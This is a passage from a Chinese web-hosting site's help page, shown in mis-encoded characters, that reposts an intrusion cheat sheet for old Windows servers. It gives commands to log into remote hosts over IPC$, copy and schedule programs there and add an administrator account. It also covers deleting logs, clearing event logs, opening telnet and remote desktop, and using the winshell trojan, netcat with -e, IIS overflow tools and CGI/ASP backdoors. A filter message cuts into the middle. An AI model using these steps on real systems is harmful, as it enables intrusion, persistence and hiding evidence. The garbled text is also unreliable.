ÆìÏÂÍøÕ¾£ºÖйúÃñÍø×¨ÒµÐéÄâÖ÷»ú£¬ÓòÃû×¢²áÍøÖйúÖ÷»úÍйÜÍø¶«Ý¸µçÐÅ×î´óÖ÷»úÍйÜÉÌ
ÐéÄâÖ÷»ú£¬Ö÷Ò³¿Õ¼ä£¬¹ú¼ÊÓòÃû£¬asp¿Õ¼ä£¬ÂÛ̳¿Õ¼ä£¬ÂÛ̳Ö÷»ú£¬asp.net¿Õ¼ä£¬Ö÷»ú×âÓã¬¿Õ¼ä£¬ÍøÕ¾¿Õ¼ä£¬·þÎñÆ÷×âÓã¬Ö÷»ú×âÓ㬷þÎñÆ÷Íйܣ¬Ö÷»úÍйܣ¬ÍøÒ³¿Õ¼ä£¬ÍøÂç¿Õ¼ä ÐéÄâÖ÷»ú£¬Ö÷Ò³¿Õ¼ä£¬¹ú¼ÊÓòÃû£¬asp¿Õ¼ä£¬ÂÛ̳¿Õ¼ä£¬ÂÛ̳Ö÷»ú£¬asp.net¿Õ¼ä£¬Ö÷»ú×âÓã¬¿Õ¼ä£¬ÍøÕ¾¿Õ¼ä£¬·þÎñÆ÷×âÓã¬Ö÷»ú×âÓ㬷þÎñÆ÷Íйܣ¬Ö÷»úÍйܣ¬ÍøÒ³¿Õ¼ä£¬ÍøÂç¿Õ¼ä ÐéÄâÖ÷»ú£¬Ö÷Ò³¿Õ¼ä£¬¹ú¼ÊÓòÃû£¬asp¿Õ¼ä£¬ÂÛ̳¿Õ¼ä£¬ÂÛ̳Ö÷»ú£¬asp.net¿Õ¼ä£¬Ö÷»ú×âÓã¬¿Õ¼ä£¬ÍøÕ¾¿Õ¼ä£¬·þÎñÆ÷×âÓã¬Ö÷»ú×âÓ㬷þÎñÆ÷Íйܣ¬Ö÷»úÍйܣ¬ÍøÒ³¿Õ¼ä£¬ÍøÂç¿Õ¼ä
ÐéÄâÖ÷»ú£¬Ö÷Ò³¿Õ¼ä£¬¹ú¼ÊÓòÃû£¬asp¿Õ¼ä£¬ÂÛ̳¿Õ¼ä£¬ÂÛ̳Ö÷»ú£¬asp.net¿Õ¼ä£¬Ö÷»ú×âÓã¬¿Õ¼ä£¬ÍøÕ¾¿Õ¼ä£¬·þÎñÆ÷×âÓã¬Ö÷»ú×âÓ㬷þÎñÆ÷Íйܣ¬Ö÷»úÍйܣ¬ÍøÒ³¿Õ¼ä£¬ÍøÂç¿Õ¼ä
Ê× Ò³ ÓòÃû×¢²á ÐéÄâÖ÷»ú Ö÷»úÍÐ¹Ü ÍøÒ³Éè¼Æ ÆóÒµÓÊ¾Ö Ë«ÏßÖ÷»ú ´úÀíÉêÇë °ïÖúÖÐÐÄ ¹ºÎï³µ
  ·µ»ØÊ×Ò³
Íø¹ÜºÍºÚ¿Í¶¼±ØÐëÖªµÀµÄÃüÁî
          ¡ï¡ï¡ï ¡¾×ÖÌ壺С ´ó¡¿

³£Óõļ¸ÌõnetÃüÁ
¡¡¡¡£¨ÓëÔ¶³ÌÖ÷»ú½¨Á¢¿Õ¹ÜÁ¬½Ó£© net use \\ipµØÖ·\ipc$ "" /use:""

¡¡¡¡£¨ÒÔ¹ÜÀíÔ±Éí·ÝµÇ¼Զ³ÌÖ÷»ú£© net use \\ipµØÖ·\ipc$ "ÃÜÂë" /use:"administrator"

¡¡¡¡£¨´«ËÍÎļþµ½Ô¶³ÌÖ÷»úwinntĿ¼Ï£©copy ±¾»úĿ¼·¾¶\³ÌÐò \\ipµØÖ·\admin$

¡¡¡¡£¨²é¿´Ô¶³ÌÖ÷»úʱ¼ä£© net time \\ipµØÖ·

¡¡¡¡£¨¶¨Ê±Æô¶¯Ä³¸ö³ÌÐò£© at \\ipµØÖ· 02:18 readme.exe

¡¡¡¡£¨²é¿´¹²Ïí£© net view \\ipµØÖ·

¡¡¡¡£¨²é¿´netbios¹¤×÷×éÁÐ±í£© nbtstat -a ipµØÖ·

¡¡¡¡£¨½«Ô¶³ÌÖ÷»úcÅÌÓ³ÉäΪ×Ô¼ºµÄfÅÌ£© net use f: \\ipµØÖ·\c$ ""/user:"administrator"

¡¡¡¡£¨ÕâÁ½Ìõ°Ñ×Ô¼ºÔö¼Óµ½¹ÜÀíÔ±×飩£º net user Óû§Ãû ÃÜÂë /add

¡¡¡¡net localgroup administrators Óû§Ãû /add

¡¡¡¡£¨¶Ï¿ªÁ¬½Ó£© net use \\ipµØÖ·\ipc$ /delete

¡¡¡¡É¨Î²£º

¡¡¡¡del c:\winnt\system32\logfiles\*.*

¡¡¡¡del c:\winnt\ssytem32\config\*.evt

¡¡¡¡del c:\winnt\system32\dtclog\*.*

¡¡¡¡del c:\winnt\system32\*.log

¡¡¡¡del c:\winnt\system32\*.txt

¡¡¡¡del c:\winnt\*.txt

¡¡¡¡del c:\winnt\*.log

¡¡¡¡Ò»¡¢netsvc.exe

¡¡¡¡ÏÂÃæµÄÃüÁî·Ö±ðÊÇÁгöÖ÷»úÉϵķþÎñÏîÄ¿¡¢²éѰºÍÔ¶³ÌÆô¶¯Ö÷»úµÄ¡°Ê±¼äÈÎÎñ¡±·þÎñ£º

¡¡¡¡netsvc /list \\ipµØÖ·

¡¡¡¡netsvc schedule \\ipµØÖ· /query

¡¡¡¡netsvc \\ipµØÖ· schedule /start

¡¡¡¡¶þ¡¢opentelnet.exe

¡¡¡¡Ô¶³ÌÆô¶¯Ö÷»úµÄtelnet·þÎñ£¬²¢°ó¶¨¶Ë¿Úµ½7878£¬ÀýÈ磺

¡¡¡¡opentelnet \\ipµØÖ· Óû§Ãû ÃÜÂë 1 7878

¡¡¡¡È»ºó¾Í¿ÉÒÔtelnetµ½Ö÷»úµÄ7878¶Ë¿Ú£¬½øÈëdos·½Ê½Ï£º

¡¡¡¡telnet ipµØÖ· 7878

¡¡¡¡Èý¡¢winshell.exe

¡¡¡¡Ò»¸ö·Ç³£Ð¡µÄľÂí£¨²»µ½6k£©£¬telnetµ½Ö÷»úµÄ7878¶Ë¿Ú£¬ÊäÈëÃÜÂëwinshell£¬µ±¿´µ½cmd>ºó£¬¿É´òÏÂÃæµÄÃüÁ

¡¡¡¡p path £¨²é¿´winshellÖ÷³ÌÐòµÄ·¾¶ÐÅÏ¢£©

¡¡¡¡b reboot £¨ÖØÐÂÆô¶¯»úÆ÷£©

¡¡¡¡d shutdown £¨¹Ø±Õ»úÆ÷£©

¡¡¡¡s shell £¨Ö´ÐкóÄã¾Í»á¿´µ½¿É°®µÄ¡°c:\>¡±£©

¡¡¡¡x exit £¨Í˳ö±¾´ÎµÇ¼»á»°£¬´ËÃüÁî²¢²»ÖÕÖ¹winshellµÄÔËÐУ©

¡¡¡¡cmd> http://.../srv.exe £¨Í¨¹ýhttpÏÂÔØÆäËûÍøÕ¾ÉϵÄÎļþµ½ÔËÐÐwinshellµÄ»úÆ÷ÉÏ£©

¡¡¡¡ËÄ¡¢3389µÇ½Æ÷£¬gui·½Ê½µÇ¼Զ³ÌÖ÷»úµÄ

¡¡¡¡Îå¡¢elsave.exe

¡¡¡¡Ê¼þÈÕÖ¾Çå³ý¹¤¾ß

¡¡¡¡elsave -s \\ipµØÖ· -l "application" -c

¡¡¡¡elsave -s \\ipµØÖ· -l "system" -c

¡¡¡¡elsave -s \\ipµØÖ· -l "security" -c

¡¡¡¡Ö´Ðкó³É¹¦Çå³ýÓ¦ÓóÌÐòÈÕÖ¾£¬ÏµÍ³ÈÕÖ¾£¬°²È«ÈÕÖ¾

¡¡¡¡Áù¡¢hbulot.exe

¡¡¡¡¿ªÆôwin2kserverºÍwinxpµÄ3389·þÎñ

¡¡¡¡hbulot [/r]

¡¡¡¡Ê¹ÓÃ/r±íʾ°²×°Íê³Éºó×Ô¶¯ÖØÆðÄ¿±êʹÉèÖÃÉúЧ¡£

¡¡¡¡Æß¡¢nc.exe(netcat.exe)

¡¡¡¡Ò»¸öºÜºÃµÄ¹¤¾ß£¬Ò»Ð©½Å±¾³ÌÐò¶¼ÒªÓõ½Ëü£¬Ò²¿É×öÒç³öºóµÄÁ¬½ÓÓá£

¡¡¡¡ÏëÒªÁ¬½Óµ½Ä³´¦: nc [-options] hostname port[s] [ports] ...

¡¡¡¡°ó¶¨¶Ë¿ÚµÈ´ýÁ¬½Ó: nc -l -p port [-options] [hostname] [port]

¡¡¡¡²ÎÊý:

¡¡¡¡-e prog ³ÌÐòÖØ¶¨Ïò£¬Ò»µ©Á¬½Ó£¬¾ÍÖ´ÐÐ [ΣÏÕ!!]

¡¡¡¡-g gateway source-routing hop point[s], up to 8

¡¡¡¡-g num source-routing pointer: 4, 8, 12, ...

¡¡¡¡-h °ïÖúÐÅÏ¢

¡¡¡¡-i secs ÑÓʱµÄ¼ä¸ô

¡¡¡¡-l ¼àÌ Ò»Á÷ÐÅÏ¢¼à¿ØÀ¹½ØÏµÍ³(IMB System)









Ò»Á÷ÐÅÏ¢¼à¿ØÏµÍ³ÌáÐÑÄú£ººÜ±§Ç¸£¬ÓÉÓÚÄúÌá½»µÄÄÚÈÝÖлò·ÃÎʵÄÄÚÈÝÖк¬ÓÐϵͳ²»ÔÊÐíµÄ¹Ø¼ü´Ê»òÕßÄúµÄIPÊܵ½ÁË·ÃÎÊÏÞÖÆ£¬±¾´Î²Ù×÷ÎÞЧ£¬ÏµÍ³ÒѼǼÄúµÄIP¼°ÄúÌá½»µÄËùÓÐÊý¾Ý¡£Çë×¢Ò⣬²»ÒªÌá½»ÈκÎÎ¥·´¹ú¼Ò¹æ¶¨µÄÄÚÈÝ£¡±¾´ÎÀ¹½ØµÄÏà¹ØÐÅϢΪ£º¼àÌý
255c/winnt/system32/cmd.exe?/c+ÎļþÃû

¡¡¡¡¾Å¡¢prihack.exeÊÇiisµÄprinterÔ¶³Ì»º³åÇøÒç³ö¹¤¾ß

¡¡¡¡idqover.exeÊÇÒç³öidqµÄ£¬Ñ¡Ôñ¡°Òç³öºóÔÚÒ»¸ö¶Ë¿Ú¼àÌý¡±£¬È»ºóÓÃtelnetÁ¬½ÓËüµÄ¼àÌý¶Ë¿Ú£¬Èç¹ûÒç³ö³É¹¦£¬Ò»Á¬ËüµÄ¶Ë¿Ú£¬°ó¶¨µÄÃüÁîÂíÉÏÖ´ÐС£xploit.exeÊÇÒ»¸öͼÐνçÃæµÄidaÒç³ö£¬³É¹¦ÒÔºówinxpÏÂÐèÒª´òwinxp¡£

¡¡¡¡Ò»¡ð¡¢ntis.exe¡¢cmd.exeºÍcmdasp.aspÊÇÈý¸öcgi-backdoor£¬exeÒª·Åµ½cgi-binĿ¼Ï£¬asp·Åµ½ÓÐaspÖ´ÐÐȨÏÞµÄĿ¼¡£È»ºóÓÃieä¯ÀÀÆ÷Á¬½Ó¡£


 

  • ÉÏһƪ°ïÖúÖÐÐÄ£º

  • ÏÂһƪ°ïÖúÖÐÐÄ£º
  • ASP¿Õ¼ä |¡¡¹ØÓÚÎÒÃÇ¡¡|¡¡ÐÂÎÅÖÐÐÄ¡¡|¡¡ºÏ×÷»ï°é¡¡|¡¡ÁªÏµ·½Ê½¡¡|¡¡ÍøÕ¾µØÍ¼¡¡|¡¡¸¶¿îÐÅÏ¢ | »ú·¿»·¾³ | ÐéÄâÖ÷»ú

    ºÏ×÷»ï°é
     

    Öйú¹ã¶«:¶«Ý¸ÊÐÄϳÇÇø¹ú¼ÊÉÌ»á´óÏÃ3A09 ÏúÊÛרÏß:0769 - 86215755 85795999 22772907 ±¾Õ¾3721ÍøÂçʵÃû£ºÍøÒ³¿Õ¼ä
    Ö÷»úÍйÜ×Éѯµç»°:0769-85795999 Ò¹¼äÖµ°àµç»°:13712017908 ´«Õæ:0769-86215756

    °æÈ¨ËùÓУºÖйúÃñÍø ÑϽû¸´ÖÆ ¹¤ÉÌ×¢²áºÅ£º4419002009137 ÔÁICP±¸05127709ºÅ